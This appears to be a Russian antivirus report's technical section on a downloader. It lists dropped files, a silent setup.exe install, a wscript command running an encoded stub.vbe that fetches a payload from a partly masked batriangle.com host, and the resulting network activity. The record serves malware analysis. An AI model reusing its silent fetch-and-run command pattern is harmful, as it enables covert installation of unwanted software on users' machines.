Техническая информация
- %TEMP%\stb1.tmp\setup.exe -i 4365a2b756354051bdb021fc0380d380 -p finderquery /S
- %TEMP%\stb1.tmp\setup.exe (загружен из сети Интернет)
- <SYSTEM32>\wscript.exe /B "%TEMP%\stb2.tmp\stub.vbe" "http://up#####.batriangle.com/install.aspx?b=###########" "%TEMP%\stb1.tmp\setup.exe" ""%TEMP%\stb1.tmp\setup.exe" -i 4365a2b756354051bdb021fc0380d380 -p finderquery /S" "http://up#####.batriangle.com/?vn###############################################################################################################################################################################################################" 0 1
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- 'up#####.batriangle.com':80
- up#####.batriangle.com/?vn#############################################################################################################################################################################################################
- up#####.batriangle.com/install.aspx?b=###########
- DNS ASK up#####.batriangle.com
- '<IP-адрес в локальной сети>':1036